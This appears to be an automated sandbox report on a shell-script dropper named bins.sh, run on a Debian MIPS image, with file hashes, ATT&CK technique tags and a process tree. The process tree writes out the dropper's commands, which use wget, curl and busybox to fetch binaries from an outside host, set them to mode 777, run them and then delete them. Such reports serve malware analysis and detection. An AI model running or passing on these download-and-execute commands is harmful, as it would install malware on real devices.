080cc74955fcef1f89a0fd18d5a2864727cc4f8a77c0913fc675d78b53e86eff

Analysis

max time kernel
146s
max time network
153s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
25-11-2024 17:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

0bab677bb7dbabe1a9fb60b3a7b95b58
SHA1

877d5a90a48d6dabfe14b245ea85a8f73354471d
SHA256

080cc74955fcef1f89a0fd18d5a2864727cc4f8a77c0913fc675d78b53e86eff
SHA512

7ec83ab03370addcc929b955531178bd158f1dd67a7c066923c3297b2a3278c264b633bbe8b7ab8557d658ebadf46427074338cdcdf59ee1682ae9734ad51f2c
SSDEEP

192:8kgtKqNBM8XGG/9VY9q9d9k9I9AtTyHkgtKqjdXb9VY9q9d9k9I9CHN:CBMGGG/9y9q9d9k9I9AtONVb9y9q9d9+

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

724 chmod
810 chmod

pid	process
724	chmod
810	chmod

Executes dropped EXE 2 IoCs

Processes:

VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsrcd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR

ioc	pid	process
/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	725	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
/tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR	811	cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR

Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
discovery

Processes:

curlcurl

description ioc process

File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetwgetcurlbusyboxwgetcurlbusybox

pid process

814 wget
697 wget
718 curl
723 busybox
728 wget
774 curl
809 busybox

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

pid	process
814	wget
697	wget
718	curl
723	busybox
728	wget
774	curl
809	busybox

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxwgetcurlbusyboxwgetcurl

description	ioc	process
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	busybox
File opened for modification	/tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR	wget
File opened for modification	/tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR	curl
File opened for modification	/tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR	busybox
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	wget
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:692
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:694
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:697
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:718
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:723
- /bin/chmod
  chmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  ./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Executes dropped EXE
  PID:725
- /bin/rm
  rm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  PID:727
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:728
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:774
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:809
- /bin/chmod
  chmod 777 cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  ./cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  - Executes dropped EXE
  PID:811
- /bin/rm
  rm cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  PID:813
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cMKrN2gdlVJ66pJWdlBItZr7RH3GInmOZF
  2⤵
  - System Network Configuration Discovery
  PID:814

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/tmp/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit